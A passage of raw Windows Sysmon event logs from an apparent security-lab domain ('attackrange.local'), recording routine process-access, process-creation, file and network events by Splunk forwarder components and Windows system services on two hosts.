Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CD64187E94AE6B5491661AD7E29D2D8,SHA256=512334374FB9E4597F43EBBD7EF3E30573D82025982F38620F9D3EFD5180F7C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440074Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.208{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-0218-6088-B628-00000000BA01}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440073Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.207{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440072Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.207{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440071Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.207{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440070Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.207{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440069Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.207{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440068Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.207{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440067Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.207{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440066Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.206{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440065Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.206{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440064Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.206{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-0218-6088-B628-00000000BA01}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440063Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.206{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-0218-6088-B628-00000000BA01}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000440062Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.206{42DC5269-0218-6088-B628-00000000BA01}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000440061Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.115{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440060Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.115{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291349Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:48.378{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=85DAC4DCF581287B2F0B5D0E04EED1AF,SHA256=A71DC48ACCA50DC5463EFC24772E9F6085BF6672509D995FC98E728BC0B415B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291351Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:49.829{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86FC30F12DCB242A1DB104C4F0337B67,SHA256=976AB4596E7C677CA534C3A70CEEE44CF81435CF130085DF94387BBEB9AB9E73,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440111Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.561{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62388-false10.0.1.12-8000- 10341000x8000000000000000440110Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.638{42DC5269-0219-6088-B828-00000000BA01}64685480C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440109Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.506{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-0219-6088-B828-00000000BA01}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440108Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.504{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440107Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.504{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440106Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.504{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440105Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.504{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440104Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.504{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440103Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.504{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440102Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.504{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440101Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.504{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440100Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 